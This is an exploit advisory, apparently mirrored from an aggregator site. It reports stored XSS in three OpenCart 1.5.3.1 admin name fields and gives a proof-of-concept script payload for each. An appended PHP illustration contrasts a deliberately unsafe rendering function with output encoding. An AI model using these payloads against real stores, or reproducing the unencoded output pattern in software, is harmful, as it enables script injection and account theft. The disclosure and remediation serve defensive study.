
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2012060285

Below is a copy:

  _  _ _ _____      _____     ____   _   _    ____   _   _  _ _____
 | |/ | |___ / _ __|___  |   / __ \ | | | |  / __ \ | | | |/ |___  |
/ __) | | |_ \| '_ \  / /   / / _` / __) __)/ / _` / __) __) |  / /
\__ \ | |___) | | | |/ /   | | (_| \__ \__ \ | (_| \__ \__ \ | / /
(   /_|_|____/|_| |_/_/     \ \__,_(   (   /\ \__,_(   (   /_|/_/
 |_|                         \____/ |_| |_|  \____/ |_| |_|


-------------------------------------------------------------------
-------------------------------------------------------------------


TITLE:  OpenCart CMS Multiple Stored XSS
Vendor: OpenCart CMS
Author: $1l3n7 @[email protected]$$17
Email:  [email protected]
Download Link: http://www.opencart.com/index.php?route=download/download
Versions: 1.5.3.1
Tested on: Windows 7


-------------------------------------------------------------------
-------------------------------------------------------------------
Description: OpenCart is an open source PHP-based online shopping cart
             system, a robust e-commerce solution for Internet merchants
             with the ability to create their own online business and
             participate in e-commerce at a minimal cost. OpenCart is
             designed to be feature rich, easy to use, and search engine
             friendly, with a visually appealing interface.
-------------------------------------------------------------------
-------------------------------------------------------------------


  Multiple Persistent XSS:

  DEMO:

      1:

        Select Catalog Drop Down -> Attribute Menu -> Select Attribute

        Select Insert Button

        In Attribute Name Field

        POST DATA= "'-->><script>alert(0)</script>

        Similarly

        Select Catalog Drop Down -> Attribute Menu -> Select Attribute Groups

        Select Insert Button

        In Attribute Group Name Field

        POST DATA= "'-->><script>alert(0)</script>

      2:

        Select Catalog Drop Down -> Select Options

        Select Insert Button

        In Option Name Field
        POST DATA= "'-->><script>alert(0)</script>


 -------------------------------------------------------------
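
The following is an added example, not part of the original advisory and not OpenCart's own code. It shows why the value from the DEMO steps persists as markup when a stored name is echoed unencoded, and how context-aware output encoding neutralises it. The function names, the row template and the assumption that the name is rendered in a table cell and an input `value` attribute are hypothetical.

```php
<?php
// Added illustration; function names and the row template are hypothetical.

// Constructed sample: names as they would sit in the database after the
// DEMO steps, plus one benign value for comparison.
$stored = [
    'attribute_name'       => '"\'-->><script>alert(0)</script>',
    'attribute_group_name' => '"\'-->><script>alert(0)</script>',
    'option_name'          => 'Colour',
];

// "Before": the stored value is concatenated into the page unchanged, so
// its quotes close the attribute and its tags become part of the document.
function render_row_unsafe(string $field, string $value): string
{
    return '<tr><td>' . $value . '</td>'
         . '<td><input type="text" name="' . $field . '" value="' . $value . '"></td></tr>';
}

// Encode for HTML text and quoted-attribute contexts. ENT_QUOTES covers
// both " and ', the two characters the value uses to leave an attribute.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// "After": every dynamic value is encoded at the point of output.
function render_row_safe(string $field, string $value): string
{
    return '<tr><td>' . e($value) . '</td>'
         . '<td><input type="text" name="' . e($field) . '" value="' . e($value) . '"></td></tr>';
}

// Regression check: did rendering introduce a script element?
function contains_script_tag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

foreach ($stored as $field => $value) {
    printf("%-22s unsafe=%s safe=%s\n", $field,
        var_export(contains_script_tag(render_row_unsafe($field, $value)), true),
        var_export(contains_script_tag(render_row_safe($field, $value)), true));
}
echo render_row_safe('attribute_name', $stored['attribute_name']), "\n";
```

Encoding at output rather than stripping at input keeps the stored data intact and also covers values that reached the database before the fix.
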

gr33t1ngs and ShOuTZ to r007k17-w and all my friends..
